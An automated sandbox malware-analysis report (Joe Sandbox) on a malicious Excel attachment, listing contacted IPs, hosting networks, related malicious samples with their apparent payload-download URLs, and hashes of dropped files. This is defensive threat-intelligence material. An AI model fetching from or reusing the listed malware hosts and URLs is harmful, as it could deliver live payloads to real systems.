http://www.icra.org/vocabulary/.	rundll32.exe, 00000004.00000002.2134118625.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2127149732.0000000001D67000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2118561626.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2115344237.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109379570.0000000001D07000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://investor.msn.com/	rundll32.exe, 00000004.00000002.2133949382.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2126985833.0000000001B80000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2117694762.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2115119309.0000000001B90000.00000002.00000001.sdmp	false		high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	rundll32.exe, 00000004.00000002.2134118625.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2127149732.0000000001D67000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2118561626.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2115344237.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109379570.0000000001D07000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.hotmail.com/oe	rundll32.exe, 00000004.00000002.2133949382.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2126985833.0000000001B80000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2117694762.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2115119309.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109184895.0000000001B20000.00000002.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
162.241.80.6	unknown	United States	46606	UNIFIEDLAYER-AS-1US	false
138.36.237.100	unknown	Argentina	27823	DattateccomAR	false
68.66.216.42	unknown	United States	55293	A2HOSTINGUS	false
72.52.227.180	unknown	United States	32244	LIQUIDWEBUS	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	356654
Start date:	23.02.2021
Start time:	14:18:11
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Complaint-447781983-02182021.xls
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal84.expl.evad.winXLS@11/13@6/4
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xls Found Word or Excel or PowerPoint or XPS Viewer Found warning dialog Click Ok Found warning dialog Click Ok Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 91.199.212.52, 2.20.142.209, 2.20.142.210, 205.185.216.42, 205.185.216.10 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, crt.usertrust.com, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, cds.d2s7q6s2.hwcdn.net, au-bg-shim.trafficmanager.net Report size getting too big, too many NtDeviceIoControlFile calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/356654/sample/Complaint-447781983-02182021.xls

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
162.241.80.6	SecuriteInfo.com.Heur.10413.xls	Get hash	malicious	Browse	pathinanchilearthmovers.com/eznwcdhx/44245960229745400000.dat
162.241.80.6	SecuriteInfo.com.Heur.10413.xls	Get hash	malicious	Browse	pathinanchilearthmovers.com/eznwcdhx/44245955293750000000.dat
138.36.237.100	SecuriteInfo.com.Heur.10413.xls	Get hash	malicious	Browse	jugueterialatorre.com.ar/xjzpfwc/44245960229745400000.dat
	SecuriteInfo.com.Heur.10413.xls	Get hash	malicious	Browse	jugueterialatorre.com.ar/xjzpfwc/44245955293750000000.dat
	CompensationClaim-46373845-02032021.xls	Get hash	malicious	Browse	jugueteriaelgato.com.ar/zsrrq/416212.jpg
	CompensationClaim-46373845-02032021.xls	Get hash	malicious	Browse	jugueteriaelgato.com.ar/zsrrq/416212.jpg
	CompensationClaim-1245593270-02032021.xls	Get hash	malicious	Browse	loonytoys.com.ar/rqksqzjvcmv/416212.jpg
	CompensationClaim-1245593270-02032021.xls	Get hash	malicious	Browse	loonytoys.com.ar/rqksqzjvcmv/416212.jpg
	fp5H5ulYUE5566sbSLC2.xls	Get hash	malicious	Browse	loonytoys.com.ar/rqksqzjvcmv/416212.jpg
	fp5H5ulYUE5566sbSLC2.xls	Get hash	malicious	Browse	loonytoys.com.ar/rqksqzjvcmv/416212.jpg
68.66.216.42	SecuriteInfo.com.Heur.10413.xls	Get hash	malicious	Browse	biblicalisraeltours.com/otmchxmxeg/44245960229745400000.dat
	SecuriteInfo.com.Heur.10413.xls	Get hash	malicious	Browse	biblicalisraeltours.com/otmchxmxeg/44245955293750000000.dat
	ac6e58332e379d0712d36c5c83985c42.xls	Get hash	malicious	Browse	biblicalisraeltours.com/ivqcapzu/987298.jpg
	ac6e58332e379d0712d36c5c83985c42.xls	Get hash	malicious	Browse	biblicalisraeltours.com/ivqcapzu/987298.jpg
72.52.227.180	SecuriteInfo.com.Heur.10413.xls	Get hash	malicious	Browse	rzminc.com/fdzgprclatqo/44245960229745400000.dat
72.52.227.180	SecuriteInfo.com.Heur.10413.xls	Get hash	malicious	Browse	rzminc.com/fdzgprclatqo/44245955293750000000.dat

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
biblicalisraeltours.com	SecuriteInfo.com.Heur.10413.xls	Get hash	malicious	Browse	68.66.216.42
	SecuriteInfo.com.Heur.10413.xls	Get hash	malicious	Browse	68.66.216.42
	ac6e58332e379d0712d36c5c83985c42.xls	Get hash	malicious	Browse	68.66.216.42
	ac6e58332e379d0712d36c5c83985c42.xls	Get hash	malicious	Browse	68.66.216.42
crt.sectigo.com	CorpReport.exe	Get hash	malicious	Browse	91.199.212.52
	sys.dll	Get hash	malicious	Browse	91.199.212.52
	CorpReport.exe	Get hash	malicious	Browse	91.199.212.52
	CorpReport.exe	Get hash	malicious	Browse	91.199.212.52
	ReportCorp.exe	Get hash	malicious	Browse	91.199.212.52
	1S0a576pAR.exe	Get hash	malicious	Browse	91.199.212.52
	NJx63jHebE.exe	Get hash	malicious	Browse	91.199.212.52
	EmployeeComplaintReport.exe	Get hash	malicious	Browse	91.199.212.52
	ct.dll	Get hash	malicious	Browse	91.199.212.52
	CompensationClaim-46373845-02032021.xls	Get hash	malicious	Browse	91.199.212.52
	CompensationClaim-46373845-02032021.xls	Get hash	malicious	Browse	91.199.212.52
	documents.doc	Get hash	malicious	Browse	91.199.212.52
	ST_Heodo_ST_2021-01-05_19-42-11-017.eml_20210105Rechnung.doc_analyze.doc	Get hash	malicious	Browse	91.199.212.52
	N.11389944 BS 05 gen 2021.doc	Get hash	malicious	Browse	91.199.212.52
	PSX7103491.doc	Get hash	malicious	Browse	91.199.212.52
	Beauftragung.doc	Get hash	malicious	Browse	91.199.212.52
	#U00e0#U00a4#U00ac#U00e0#U00a5#U20ac#U00e0#U00a4#U0153#U00e0#U00a4#U2022.doc	Get hash	malicious	Browse	91.199.212.52
	https://emailcpcc-my.sharepoint.com:443/:b:/g/personal/aswania0_email_cpcc_edu/ESAvfBZdvHBMvBJK1bnZfsoBXf5RRY-PIqJk-UtmqkDXjQ?e=4%3auSHA5p&at=9&d=DwMBaQ	Get hash	malicious	Browse	91.199.212.52
	rib.exe	Get hash	malicious	Browse	91.199.212.52
	https://blog.premiershop.com.br/check/m.php	Get hash	malicious	Browse	91.199.212.52
rzminc.com	SecuriteInfo.com.Heur.10413.xls	Get hash	malicious	Browse	72.52.227.180
rzminc.com	SecuriteInfo.com.Heur.10413.xls	Get hash	malicious	Browse	72.52.227.180
jugueterialatorre.com.ar	SecuriteInfo.com.Heur.10413.xls	Get hash	malicious	Browse	138.36.237.100
jugueterialatorre.com.ar	SecuriteInfo.com.Heur.10413.xls	Get hash	malicious	Browse	138.36.237.100
pathinanchilearthmovers.com	SecuriteInfo.com.Heur.10413.xls	Get hash	malicious	Browse	162.241.80.6
pathinanchilearthmovers.com	SecuriteInfo.com.Heur.10413.xls	Get hash	malicious	Browse	162.241.80.6

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DattateccomAR	SecuriteInfo.com.Heur.10413.xls	Get hash	malicious	Browse	138.36.237.100
	SecuriteInfo.com.Heur.10413.xls	Get hash	malicious	Browse	138.36.237.100
	swift copy pdf.exe	Get hash	malicious	Browse	200.58.111.74
	Purchase Order _pdf.exe	Get hash	malicious	Browse	200.58.111.74
	Purchase Order _pdf.exe	Get hash	malicious	Browse	200.58.111.74
	CompensationClaim-46373845-02032021.xls	Get hash	malicious	Browse	138.36.237.100
	CompensationClaim-46373845-02032021.xls	Get hash	malicious	Browse	138.36.237.100
	CompensationClaim-1245593270-02032021.xls	Get hash	malicious	Browse	138.36.237.100
	CompensationClaim-1245593270-02032021.xls	Get hash	malicious	Browse	138.36.237.100
	fp5H5ulYUE5566sbSLC2.xls	Get hash	malicious	Browse	138.36.237.100
	fp5H5ulYUE5566sbSLC2.xls	Get hash	malicious	Browse	138.36.237.100
	Payment Advice.xlsx	Get hash	malicious	Browse	66.97.33.176
	Meezan Bank Payment.xlsx	Get hash	malicious	Browse	179.43.117.150
	Walmart Order.xlsx	Get hash	malicious	Browse	179.43.117.150
	INQUIRY-NOV-ORDER.xls	Get hash	malicious	Browse	179.43.114.162
	https://bit.ly/38rE21V?/rt/stone/	Get hash	malicious	Browse	200.58.98.166
	PQ-237.xls	Get hash	malicious	Browse	66.97.33.213
	PQ-237.xls	Get hash	malicious	Browse	66.97.33.213
	PQ-171.xls	Get hash	malicious	Browse	66.97.33.213
	PQ-171.xls	Get hash	malicious	Browse	66.97.33.213
UNIFIEDLAYER-AS-1US	Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Get hash	malicious	Browse	50.116.112.43
	ORDER SPECIFICATIONS.exe	Get hash	malicious	Browse	50.87.196.120
	PO-A2174679-06.exe	Get hash	malicious	Browse	192.185.78.145
	22 FEB -PROCESSING.xlsx	Get hash	malicious	Browse	108.167.156.42
	CV-JOB REQUEST______PDF.EXE	Get hash	malicious	Browse	192.185.181.49
	PO.exe	Get hash	malicious	Browse	192.185.0.218
	Complaint-1091191320-02182021.xls	Get hash	malicious	Browse	192.185.16.95
	ESCANEAR_FACTURA-20794564552_docx.exe	Get hash	malicious	Browse	162.214.158.75
	AWB-INVOICE_PDF.exe	Get hash	malicious	Browse	192.185.46.55
	iAxkn PDF.exe	Get hash	malicious	Browse	192.185.100.181
	carta de pago pdf.exe	Get hash	malicious	Browse	192.185.5.166
	PO.exe	Get hash	malicious	Browse	108.179.232.42
	payment details.pdf.exe	Get hash	malicious	Browse	50.87.95.32
	new order.exe	Get hash	malicious	Browse	108.179.232.42
	CV-JOB REQUEST______pdf.exe	Get hash	malicious	Browse	192.185.181.49
	RdLlHaxEKP.exe	Get hash	malicious	Browse	162.214.184.71
	Drawings2.exe	Get hash	malicious	Browse	198.57.247.220
	EFT Remittance.xls	Get hash	malicious	Browse	162.241.120.180
	Remittance Advice.xls	Get hash	malicious	Browse	162.241.120.180
	Complaint_Letter_1212735678-02192021.xls	Get hash	malicious	Browse	192.185.17.119
A2HOSTINGUS	SecuriteInfo.com.Heur.10413.xls	Get hash	malicious	Browse	68.66.216.42
	SecuriteInfo.com.Heur.10413.xls	Get hash	malicious	Browse	68.66.216.42
	Statement_of_Account_as_of 02_17_2021.xlsm	Get hash	malicious	Browse	68.66.248.35
	Statement_of_Account_as_of 02_17_2021.xlsm	Get hash	malicious	Browse	68.66.248.35
	Claim-121548989-02162021.xls	Get hash	malicious	Browse	68.66.226.85
	ProtectedAdviceSlip.xls	Get hash	malicious	Browse	70.32.23.16
	v1K1JNtCgt.exe	Get hash	malicious	Browse	209.124.66.12
	CompensationClaim-1625519734-02022021.xls	Get hash	malicious	Browse	185.148.129.158
	CompensationClaim-1625519734-02022021.xls	Get hash	malicious	Browse	185.148.129.158
	CompensationClaim-1828072340-02022021.xls	Get hash	malicious	Browse	185.148.129.158
	CompensationClaim-1828072340-02022021.xls	Get hash	malicious	Browse	185.148.129.158
	ac6e58332e379d0712d36c5c83985c42.xls	Get hash	malicious	Browse	185.148.129.158
	ac6e58332e379d0712d36c5c83985c42.xls	Get hash	malicious	Browse	185.148.129.158
	CompensationClaim-1378529713-02022021.xls	Get hash	malicious	Browse	185.148.129.158
	CompensationClaim-1378529713-02022021.xls	Get hash	malicious	Browse	185.148.129.158
	v22Pc0qA.doc.doc	Get hash	malicious	Browse	70.32.23.44
	2wUaqWdy.doc.doc	Get hash	malicious	Browse	70.32.23.44
	A3kAp3uzpg.xlsm	Get hash	malicious	Browse	85.187.128.19
	X.exe	Get hash	malicious	Browse	66.198.240.46
	68254_2001.doc	Get hash	malicious	Browse	70.32.23.58

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
7dcce5b76c8b17472d024758970a406b	mexhlc.xlsx	Get hash	malicious	Browse	138.36.237.100
	document-550193913.xls	Get hash	malicious	Browse	138.36.237.100
	document-1915351743.xls	Get hash	malicious	Browse	138.36.237.100
	SecuriteInfo.com.Heur.15528.xls	Get hash	malicious	Browse	138.36.237.100
	Subconract 504.xlsm	Get hash	malicious	Browse	138.36.237.100
	upbck.xlsx	Get hash	malicious	Browse	138.36.237.100
	IMG_6078_SCANNED.doc	Get hash	malicious	Browse	138.36.237.100
	RFQ Manual Supersucker en Espaol.xlsx	Get hash	malicious	Browse	138.36.237.100
	_a6590.docx	Get hash	malicious	Browse	138.36.237.100
	Small Charities.xlsx	Get hash	malicious	Browse	138.36.237.100
	quotation10204168.dox.xlsx	Get hash	malicious	Browse	138.36.237.100
	notice of arrival.xlsx	Get hash	malicious	Browse	138.36.237.100
	22-2-2021 .xlsx	Get hash	malicious	Browse	138.36.237.100
	Shipping_Document.xlsx	Get hash	malicious	Browse	138.36.237.100
	Remittance copy.xlsx	Get hash	malicious	Browse	138.36.237.100
	CI + PL.xlsx	Get hash	malicious	Browse	138.36.237.100
	RFQ_Enquiry_0002379_.xlsx	Get hash	malicious	Browse	138.36.237.100
	124992436.docx	Get hash	malicious	Browse	138.36.237.100
	document-1900770373.xls	Get hash	malicious	Browse	138.36.237.100
	AswpCUetE0.doc	Get hash	malicious	Browse	138.36.237.100

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\30D802E0E248FEE17AAF4A62594CC75A Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	1559
Entropy (8bit):	7.399832861783252
Encrypted:	false
SSDEEP:	48:B4wgi+96jf8TXJgnXpxi4sVtcTtrdoh+S:KiIq0eZnep
MD5:	ADAB5C4DF031FB9299F71ADA7E18F613
SHA1:	33E4E80807204C2B6182A3A14B591ACD25B5F0DB
SHA-256:	7FA4FF68EC04A99D7528D5085F94907F4D1DD1C5381BACDC832ED5C960214676
SHA-512:	983B974E459A46EB7A3C8850EC90CC16D3B6D4A1505A5BCDD710C236BAF5AADC58424B192E34A147732E9D436C9FC04D896D8A7700FF349252A57514F588C6A1
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	0...0..........}[Q&.v...t...S..0....H........0..1.0...U....US1.0...U....New Jersey1.0...U....Jersey City1.0...U....The USERTRUST Network1.0,..U...%USERTrust RSA Certification Authority0...181102000000Z..301231235959Z0..1.0...U....GB1.0...U....Greater Manchester1.0...U....Salford1.0...U....Sectigo Limited1705..U....Sectigo RSA Domain Validation Secure Server CA0.."0....H.............0.........s3..< ....E..>..?.A.20.l.......-?.M......b..Hy...N..2%.....P?.L.@*.9.....2A.&.#z. ... .<.Do.u..@.2.....#>...o]Q.j.i.O.ri..Lm.....~......7x...4.V.X....d[.7..(h.V...\......$..0......z...B......J.....@..o.BJd..0.....'Z..X......c.oV...`4.t........_.........n0..j0...U.#..0...Sy.Z.+J.T.......f.0...U........^.T...w.......a.0...U...........0...U.......0.......0...U.%..0...+.........+.......0...U. ..0.0...U. .0...g.....0P..U...I0G0E.C.A.?http://crl.usertrust.com/USERTrustRSACertificationAuthority.crl0v..+........j0h0?..+.....0..3http://crt.usertrust.com/USERTrustRSAAddTrustCA.crt0%..+.....0.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Microsoft Cabinet archive data, 59134 bytes, 1 file
Category:	dropped
Size (bytes):	59134
Entropy (8bit):	7.995450161616763
Encrypted:	true
SSDEEP:	1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
MD5:	E92176B0889CC1BB97114BEB2F3C1728
SHA1:	AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
SHA-256:	58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
SHA-512:	CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7I.....e..Y..Rq...3.n..u..............\|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b.....[...L..c..a..,...E5X..i.d..w.....#o+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0968A1E3A40D2582E7FD463BAEB59CD Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	1413
Entropy (8bit):	7.480496427934893
Encrypted:	false
SSDEEP:	24:yYvJm3RW857Ij3kTteTuQRFjGgZLE5XBy9+JYSE19rVAVsGnyI3SKB7:PL854TTuQL/ZoXQ9+mrGVrb3R
MD5:	285EC909C4AB0D2D57F5086B225799AA
SHA1:	D89E3BD43D5D909B47A18977AA9D5CE36CEE184C
SHA-256:	68B9C761219A5B1F0131784474665DB61BBDB109E00F05CA9F74244EE5F5F52B
SHA-512:	4CF305B95F94C7A9504C53C7F2DC8068E647A326D95976B7F4D80433B2284506FC5E3BB9A80A4E9A9889540BBF92908DD39EE4EB25F2566FE9AB37B4DC9A7C09
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	0...0..i.......9rD:.".Q..l..15.0....H........0{1.0...U....GB1.0...U....Greater Manchester1.0...U....Salford1.0...U....Comodo CA Limited1!0...U....AAA Certificate Services0...190312000000Z..281231235959Z0..1.0...U....US1.0...U....New Jersey1.0...U....Jersey City1.0...U....The USERTRUST Network1.0,..U...%USERTrust RSA Certification Authority0.."0....H.............0..........e.6......W.v..'.L.P.a. M.-d.....=.........{7(.+G.9.:.._..}..cB.v.;+...o... ..>..t.....bd......j."<......{......Q..gF.Q..T?.3.~l......Q.5..f.rg.!f..x..P:.....L....5.WZ....=.,..T....:M.L..\... =.."4.~;hf.D..NFS.3`...S7.sC.2.S...tNi.k.`.......2..;Qx.g..=V...i....%&k3m.nG.sC.~..f.)\|2.cU.....T0....}7..]:l5\.A...I......b..f.%....?.9......L.\|.k..^...g.....[..L..[...s.#;-..5Ut.I.IX...6.Q...&}.M....C&.A_@.DD...W..P.WT.>.tc/.Pe..XB.C.L..%GY.....&FJP...x..g...W...c..b.._U..\.(..%9..+..L...?.R.../..........0..0...U.#..0......#>.....)...0..0...U......Sy.Z.+J.T.......f.0...U...........0...U.......0....0...U

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\30D802E0E248FEE17AAF4A62594CC75A Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	282
Entropy (8bit):	3.105771655332669
Encrypted:	false
SSDEEP:	3:kkFklFqVXfllXlE/lPbXx8bqlF8tlije9DZl2i9XYolzlIlMltuN7ANJbZ15lqRY:kKrVqjXxp9jKFlIaYM2+/LOjA/
MD5:	519FA359038F5F04BF0467C62166B066
SHA1:	E0CEDCA2ED23193823C452E90929E3B6A4C6BFF2
SHA-256:	67C82CDCD6D8255E0A276DFEEDF83C292080D35EFCD963C0CC9E41E8BB1A4248
SHA-512:	C913BDE835CB6299A745FF270D266712F6593846FF7A99453A69356F473E1D1912BFD533BAEBF3AD6139638DEEB8F5F8499C950A24F58F1825C0D3957EBB4684
Malicious:	false
Reputation:	low
Preview:	p...... ........0w".1...(....................................................... ........@u.>r..@8..................h.t.t.p.:././.c.r.t...s.e.c.t.i.g.o...c.o.m./.S.e.c.t.i.g.o.R.S.A.D.o.m.a.i.n.V.a.l.i.d.a.t.i.o.n.S.e.c.u.r.e.S.e.r.v.e.r.C.A...c.r.t...".5.b.d.b.9.3.8.0.-.6.1.7."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.074054151935177
Encrypted:	false
SSDEEP:	6:kKtkpbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:F3kPlE99SNxAhUeo+aKt
MD5:	ED2352E312DABFEFC7D6BD97DB1EB257
SHA1:	0BB4AF2AB95EF5B3EE3D2860922351D14D0C369F
SHA-256:	907C215428ABB6BFABCBAFBB04A02F1FF01A455A6D849DD49B6A2B945512D084
SHA-512:	29ED2314699C3A1AD13F4A1C14B4893F6437A2C4A224C8F9B9FE984D09C5624503E7B84B262A162EA740C13132931E92EBB0519DEE14EBE8AC062F7F2FF70445
Malicious:	false
Reputation:	low
Preview:	p...... ............1...(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0968A1E3A40D2582E7FD463BAEB59CD Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	250
Entropy (8bit):	2.9582678255161445
Encrypted:	false
SSDEEP:	3:kkFklNlAvykXfllXlE/lQcjT18tlwiANjpU+plgh3VEkax3QbaLU15lqErtd9lyt:kKrqQAbjMulgokaWbLOW+n
MD5:	44C0AAECFAB901756E1AE7F56994A4E6
SHA1:	CA8613B392CBC61417BDC2AE699BBCE04DD934F5
SHA-256:	A2A544BB9625361ED5C7D801ACD49CA367BC70A5BC40F44980A6908A2503C732
SHA-512:	CBD46303D884F8BC761542FCA848E2C5709596FE46141C08DF20F96AD32FB28BE8132FAC0250004A9C112B778CEAC355A365B4D268DE819C9E3B62F941C2CAE3
Malicious:	false
Reputation:	low
Preview:	p...... ....h.....R.1...(....................................................... .........(.f...@8..................h.t.t.p.:././.c.r.t...u.s.e.r.t.r.u.s.t...c.o.m./.U.S.E.R.T.r.u.s.t.R.S.A.A.d.d.T.r.u.s.t.C.A...c.r.t...".5.c.8.6.f.6.8.0.-.5.8.5."...

C:\Users\user\AppData\Local\Temp\CabDC6B.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Microsoft Cabinet archive data, 59134 bytes, 1 file
Category:	dropped
Size (bytes):	59134
Entropy (8bit):	7.995450161616763
Encrypted:	true
SSDEEP:	1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
MD5:	E92176B0889CC1BB97114BEB2F3C1728
SHA1:	AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
SHA-256:	58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
SHA-512:	CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7I.....e..Y..Rq...3.n..u..............\|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b.....[...L..c..a..,...E5X..i.d..w.....#o+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.

C:\Users\user\AppData\Local\Temp\F2CE0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	31752
Entropy (8bit):	7.6477928497964065
Encrypted:	false
SSDEEP:	768:TkBP+MDFc5uhNUuOW+u7qS7oauYEmUI/VUH:TQWMHNffMaFTa
MD5:	7C771549E6E2B25F4912E8A690BB97B8
SHA1:	365D0956D029E9C42270984108E5434DB180FD8F
SHA-256:	294EB8B42606FA4FE2DADF28D7F504BBF8D81FAE78E42E6CB590D4E44D9C334F
SHA-512:	834A34028F92F9F3F2CCA9E13809D6F856EAEA0C10C0A313733710A0CD6DCFF792C40CEC2F336A1416D5797C2A09C40A2271C2A4344EE93CE9262389003CAE3B
Malicious:	false
Preview:	.U.n.0....?......(..r.Mrl.$...\K....I..v..pl).E.R.3;+.N.V.TO.Q{..f.*p.+..y......pJ..ek@v5..i.........O)...e.V`..8.Y.hE.... .Rt./'.o\z...:..l6...x4..Y..FIp..~n..T-.6..:?..k...!.-E....S{.j.Xh...GKb...... Y..Ic.....\|.3..q.[..B.a.._.w...[.^g.....F....1.....+.}\._6.dk,..`...c.........(<.T....b....x5r&%...E.X!......\..w<M....\.7..9.........m..b.E.u...u.]...'t.(....}8..m...C~..E.....?..Z.]..i.D.O..B3....b.k..Z....x.A.yJ)P..y...........PK..........!........V.......[Content_Types].xml ...(.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TarDC6C.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	152788
Entropy (8bit):	6.316654432555028
Encrypted:	false
SSDEEP:	1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
MD5:	64FEDADE4387A8B92C120B21EC61E394
SHA1:	15A2673209A41CCA2BC3ADE90537FE676010A962
SHA-256:	BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
